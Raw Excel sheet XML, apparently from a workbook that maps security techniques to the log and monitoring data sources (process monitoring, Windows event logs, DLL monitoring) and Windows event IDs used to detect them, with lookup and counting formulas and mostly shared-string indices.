        <v>3</v>
      </c>
      <c r="F200" s="6"/>
      <c r="G200" s="6"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A201" s="11" t="s">
        <v>261</v>
      </c>
      <c r="B201" s="6" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C201" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D201" s="6">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E201" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F201" s="6"/>
      <c r="G201" s="6"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A202" s="11" t="s">
        <v>262</v>
      </c>
      <c r="B202" s="6" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C202" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D202" s="6">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E202" s="6">
        <f t="shared" ref="E202:E224" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F202" s="6"/>
      <c r="G202" s="6"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A203" s="11" t="s">
        <v>263</v>
      </c>
      <c r="B203" s="6" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C203" s="12" t="s">
        <v>1287</v>
      </c>
      <c r="D203" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E203" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F203" s="6"/>
      <c r="G203" s="6"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A204" s="11" t="s">
        <v>264</v>
      </c>
      <c r="B204" s="6" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C204" s="12" t="s">
        <v>1237</v>
      </c>
      <c r="D204" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E204" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F204" s="6"/>
      <c r="G204" s="6"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A205" s="11" t="s">
        <v>265</v>
      </c>
      <c r="B205" s="6" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="12" t="s">
        <v>1237</v>
      </c>
      <c r="D205" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F205" s="6"/>
      <c r="G205" s="6"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A206" s="11" t="s">
        <v>266</v>
      </c>
      <c r="B206" s="6" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C206" s="12">
        <v>0</v>
      </c>
      <c r="D206" s="6">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E206" s="6">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="6"/>
      <c r="G206" s="6"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A207" s="11" t="s">
        <v>267</v>
      </c>
      <c r="B207" s="6" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C207" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D207" s="6">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E207" s="6">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F207" s="6"/>
      <c r="G207" s="6"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A208" s="11" t="s">
        <v>268</v>
      </c>
      <c r="B208" s="6" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C208" s="12" t="s">
        <v>1304</v>
      </c>
      <c r="D208" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F208" s="6"/>
      <c r="G208" s="6"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A209" s="11" t="s">
        <v>269</v>
      </c>
      <c r="B209" s="6" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C209" s="12">
        <v>100</v>
      </c>
      <c r="D209" s="6">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E209" s="6">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="6"/>
      <c r="G209" s="6"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A210" s="11" t="s">
        <v>270</v>
      </c>
      <c r="B210" s="6" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C210" s="12" t="s">
        <v>1305</v>
      </c>
      <c r="D210" s="6">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E210" s="6">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="F210" s="6"/>
      <c r="G210" s="6"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A211" s="11" t="s">
        <v>271</v>
      </c>
      <c r="B211" s="6" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C211" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D211" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F211" s="6"/>
      <c r="G211" s="6"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A212" s="11" t="s">
        <v>272</v>
      </c>
      <c r="B212" s="6" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C212" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D212" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E212" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F212" s="6"/>
      <c r="G212" s="6"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A213" s="11" t="s">
        <v>273</v>
      </c>
      <c r="B213" s="6" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C213" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D213" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E213" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F213" s="6"/>
      <c r="G213" s="6"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A214" s="11" t="s">
        <v>274</v>
      </c>
      <c r="B214" s="6" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C214" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D214" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E214" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F214" s="6"/>
      <c r="G214" s="6"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A215" s="11" t="s">
        <v>275</v>
      </c>
      <c r="B215" s="6" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C215" s="12" t="s">
        <v>1281</v>
      </c>
      <c r="D215" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E215" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F215" s="6"/>
      <c r="G215" s="6"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A216" s="11" t="s">
        <v>276</v>
      </c>
      <c r="B216" s="6" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C216" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D216" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E216" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F216" s="6"/>
      <c r="G216" s="6"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A217" s="11" t="s">
        <v>277</v>
      </c>
      <c r="B217" s="6" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C217" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D217" s="6">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217" s="6">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="6"/>
      <c r="G217" s="6"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A218" s="11" t="s">
        <v>278</v>
      </c>
      <c r="B218" s="6" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C218" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D218" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E218" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F218" s="6"/>
      <c r="G218" s="6"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A219" s="11" t="s">
        <v>279</v>
      </c>
      <c r="B219" s="6" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C219" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D219" s="6">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E219" s="6">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="6"/>
      <c r="G219" s="6"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A220" s="11" t="s">
        <v>280</v>
      </c>
      <c r="B220" s="6" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C220" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D220" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E220" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F220" s="6"/>
      <c r="G220" s="6"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A221" s="11" t="s">
        <v>281</v>
      </c>
      <c r="B221" s="6" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C221" s="12" t="s">
        <v>1300</v>
      </c>
      <c r="D221" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F221" s="6"/>
      <c r="G221" s="6"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A222" s="11" t="s">
        <v>282</v>
      </c>
      <c r="B222" s="6" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C222" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D222" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F222" s="6"/>
      <c r="G222" s="6"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A223" s="11" t="s">
        <v>283</v>
      </c>
      <c r="B223" s="6" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C223" s="12" t="s">
        <v>1273</v>
      </c>
      <c r="D223" s="6">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E223" s="6">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F223" s="6"/>
      <c r="G223" s="6"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A224" s="11" t="s">
        <v>284</v>
      </c>
      <c r="B224" s="6" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C224" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D224" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E224" s="6">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F224" s="6"/>
      <c r="G224" s="6"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A225" s="6"/>
      <c r="B225" s="6"/>
      <c r="C225" s="12"/>
      <c r="D225" s="6"/>
      <c r="E225" s="6"/>
      <c r="F225" s="6"/>
      <c r="G225" s="6"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A226" s="6"/>
      <c r="B226" s="6"/>
      <c r="C226" s="12"/>
      <c r="D226" s="6"/>
      <c r="E226" s="6"/>
      <c r="F226" s="6"/>
      <c r="G226" s="6"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A227" s="6"/>
      <c r="B227" s="6"/>
      <c r="C227" s="12"/>
      <c r="D227" s="6"/>
      <c r="E227" s="6"/>
      <c r="F227" s="6"/>
      <c r="G227" s="6"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A228" s="6"/>
      <c r="B228" s="6"/>
      <c r="C228" s="12"/>
      <c r="D228" s="6"/>
      <c r="E228" s="6"/>
      <c r="F228" s="6"/>
      <c r="G228" s="6"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A229" s="6"/>
      <c r="B229" s="6"/>
      <c r="C229" s="12"/>
      <c r="D229" s="6"/>
      <c r="E229" s="6"/>
      <c r="F229" s="6"/>
      <c r="G229" s="6"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A230" s="6"/>
      <c r="B230" s="6"/>
      <c r="C230" s="12"/>
      <c r="D230" s="6"/>
      <c r="E230" s="6"/>
      <c r="F230" s="6"/>
      <c r="G230" s="6"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A231" s="6"/>
      <c r="B231" s="6"/>
      <c r="C231" s="12"/>
      <c r="D231" s="6"/>
      <c r="E231" s="6"/>
      <c r="F231" s="6"/>
      <c r="G231" s="6"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A232" s="6"/>
      <c r="B232" s="6"/>
      <c r="C232" s="12"/>
      <c r="D232" s="6"/>
      <c r="E232" s="6"/>
      <c r="F232" s="6"/>
      <c r="G232" s="6"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A233" s="6"/>
      <c r="B233" s="6"/>
      <c r="C233" s="12"/>
      <c r="D233" s="6"/>
      <c r="E233" s="6"/>
      <c r="F233" s="6"/>
      <c r="G233" s="6"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A234" s="6"/>
      <c r="B234" s="6"/>
      <c r="C234" s="12"/>
      <c r="D234" s="6"/>
      <c r="E234" s="6"/>
      <c r="F234" s="6"/>
      <c r="G234" s="6"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A235" s="6"/>
      <c r="B235" s="6"/>
      <c r="C235" s="12"/>
      <c r="D235" s="6"/>
      <c r="E235" s="6"/>
      <c r="F235" s="6"/>
      <c r="G235" s="6"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A236" s="6"/>
      <c r="B236" s="6"/>
      <c r="C236" s="12"/>
      <c r="D236" s="6"/>
      <c r="E236" s="6"/>
      <c r="F236" s="6"/>
      <c r="G236" s="6"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A237" s="6"/>
      <c r="B237" s="6"/>
      <c r="C237" s="12"/>
      <c r="D237" s="6"/>
      <c r="E237" s="6"/>
      <c r="F237" s="6"/>
      <c r="G237" s="6"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A238" s="6"/>
      <c r="B238" s="6"/>
      <c r="C238" s="12"/>
      <c r="D238" s="6"/>
      <c r="E238" s="6"/>
      <c r="F238" s="6"/>
      <c r="G238" s="6"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A239" s="6"/>
      <c r="B239" s="6"/>
      <c r="C239" s="12"/>
      <c r="D239" s="6"/>
      <c r="E239" s="6"/>
      <c r="F239" s="6"/>
      <c r="G239" s="6"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A240" s="6"/>
      <c r="B240" s="6"/>
      <c r="C240" s="12"/>
      <c r="D240" s="6"/>
      <c r="E240" s="6"/>
      <c r="F240" s="6"/>
      <c r="G240" s="6"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A241" s="6"/>
      <c r="B241" s="6"/>
      <c r="C241" s="12"/>
      <c r="D241" s="6"/>
      <c r="E241" s="6"/>
      <c r="F241" s="6"/>
      <c r="G241" s="6"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A242" s="6"/>
      <c r="B242" s="6"/>
      <c r="C242" s="12"/>
      <c r="D242" s="6"/>
      <c r="E242" s="6"/>
      <c r="F242" s="6"/>
      <c r="G242" s="6"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A243" s="6"/>
      <c r="B243" s="6"/>
      <c r="C243" s="12"/>
      <c r="D243" s="6"/>
      <c r="E243" s="6"/>
      <c r="F243" s="6"/>
      <c r="G243" s="6"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A244" s="6"/>
      <c r="B244" s="6"/>
      <c r="C244" s="12"/>
      <c r="D244" s="6"/>
      <c r="E244" s="6"/>
      <c r="F244" s="6"/>
      <c r="G244" s="6"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A245" s="6"/>
      <c r="B245" s="6"/>
      <c r="C245" s="12"/>
      <c r="D245" s="6"/>
      <c r="E245" s="6"/>
      <c r="F245" s="6"/>
      <c r="G245" s="6"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A246" s="6"/>
      <c r="B246" s="6"/>
      <c r="C246" s="12"/>
      <c r="D246" s="6"/>
      <c r="E246" s="6"/>
      <c r="F246" s="6"/>
      <c r="G246" s="6"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A247" s="6"/>
      <c r="B247" s="6"/>
      <c r="C247" s="12"/>
      <c r="D247" s="6"/>
      <c r="E247" s="6"/>
      <c r="F247" s="6"/>
      <c r="G247" s="6"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>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3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B17" sqref="B17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="22.7109375" customWidth="1"/>
    <col min="2" max="2" width="27.28515625" customWidth="1"/>
    <col min="3" max="3" width="141.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A1" s="20" t="s">
        <v>1310</v>
      </c>
      <c r="B1" s="20"/>
      <c r="C1" s="20"/>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A2" s="25"/>
      <c r="B2" s="25"/>
      <c r="C2" s="25"/>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" s="4" t="s">
        <v>1312</v>
      </c>
      <c r="B3" s="4"/>
      <c r="C3" s="4"/>
    </row>
    <row r="4" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A4" s="21" t="s">
        <v>285</v>
      </c>
      <c r="B4" s="22" t="s">
        <v>286</v>
      </c>
      <c r="C4" s="23" t="s">
        <v>1307</v>
      </c>
    </row>
    <row r="5" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A5" s="21" t="s">
        <v>287</v>
      </c>
      <c r="B5" s="22" t="s">
        <v>286</v>
      </c>
      <c r="C5" s="22" t="s">
        <v>1309</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A6" s="21" t="s">
        <v>288</v>
      </c>
      <c r="B6" s="22" t="s">
        <v>286</v>
      </c>
      <c r="C6" s="22" t="s">
        <v>1308</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A7" s="21"/>
      <c r="B7" s="22"/>
      <c r="C7" s="22"/>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A8" s="4" t="s">
        <v>1313</v>
      </c>
      <c r="B8" s="4"/>
      <c r="C8" s="4"/>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A9" s="21" t="s">
        <v>57</v>
      </c>
      <c r="B9" s="22" t="s">
        <v>1311</v>
      </c>
      <c r="C9" s="22" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A10" s="24"/>
      <c r="B10" s="24"/>
      <c r="C10" s="24" t="s">
        <v>1315</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A11" s="24"/>
      <c r="B11" s="24"/>
      <c r="C11" s="24"/>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A12" s="24"/>
      <c r="B12" s="24"/>
      <c r="C12" s="24"/>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A13" s="24"/>
      <c r="B13" s="24"/>
      <c r="C13"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94"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A11" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B35" sqref="B35"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="30.7109375" style="14" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="66.28515625" style="14" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="27.5703125" style="14" customWidth="1"/>
    <col min="4" max="4" width="35.85546875" style="14" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="9.140625" style="14"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="10" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="10" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="16" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="16" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>5</v>
      </c>
      <c r="C2" s="6"/>
      <c r="D2" s="17">
        <v>8003</v>
      </c>
      <c r="E2" s="6"/>
      <c r="F2" s="5"/>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>6</v>
      </c>
      <c r="C3" s="6"/>
      <c r="D3" s="17">
        <v>8006</v>
      </c>
      <c r="E3" s="6"/>
      <c r="F3" s="5"/>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>7</v>
      </c>
      <c r="C4" s="6"/>
      <c r="D4" s="17" t="s">
        <v>8</v>
      </c>
      <c r="E4" s="6"/>
      <c r="F4" s="5"/>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="6"/>
      <c r="D5" s="17">
        <v>1002</v>
      </c>
      <c r="E5" s="6"/>
      <c r="F5" s="5"/>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>11</v>
      </c>
      <c r="C6" s="6"/>
      <c r="D6" s="17">
        <v>1001</v>
      </c>
      <c r="E6" s="6"/>
      <c r="F6" s="5"/>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>12</v>
      </c>
      <c r="C7" s="6"/>
      <c r="D7" s="17">
        <v>2</v>
      </c>
      <c r="E7" s="6"/>
      <c r="F7" s="5"/>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8" s="6" t="s">
        <v>13</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>14</v>
      </c>
      <c r="C8" s="6"/>
      <c r="D8" s="17" t="s">
        <v>15</v>
      </c>
      <c r="E8" s="6"/>
      <c r="F8" s="5"/>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9" s="6" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>17</v>
      </c>
      <c r="C9" s="6"/>
      <c r="D9" s="17">
        <v>2004</v>
      </c>
      <c r="E9" s="6"/>
      <c r="F9" s="5"/>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10" s="6" t="s">
        <v>16</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>18</v>
      </c>
      <c r="C10" s="6"/>
      <c r="D10" s="17">
        <v>2005</v>
      </c>
      <c r="E10" s="6"/>
      <c r="F10" s="5"/>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11" s="6" t="s">
        <v>16</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>19</v>
      </c>
      <c r="C11" s="6"/>
      <c r="D11" s="17" t="s">
        <v>20</v>
      </c>
      <c r="E11" s="6"/>
      <c r="F11" s="5"/>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12" s="6" t="s">
        <v>21</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>22</v>
      </c>
      <c r="C12" s="6"/>
      <c r="D12" s="17">
        <v>104</v>
      </c>
      <c r="E12" s="6"/>
      <c r="F12" s="5"/>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13" s="6" t="s">
        <v>21</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>23</v>
      </c>
      <c r="C13" s="6"/>
      <c r="D13" s="17">
        <v>1102</v>
      </c>
      <c r="E13" s="6"/>
      <c r="F13" s="5"/>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14" s="6" t="s">
        <v>21</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>24</v>
      </c>
      <c r="C14" s="6" t="s">
        <v>25</v>
      </c>
      <c r="D14" s="17">
        <v>6005</v>
      </c>
      <c r="E14" s="6"/>
      <c r="F14" s="5"/>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15" s="6" t="s">
        <v>26</v>
      </c>
      <c r="B15" s="6" t="s">
        <v>27</v>
      </c>
      <c r="C15" s="6" t="s">
        <v>28</v>
      </c>
      <c r="D15" s="17">
        <v>6</v>
      </c>
      <c r="E15" s="6"/>
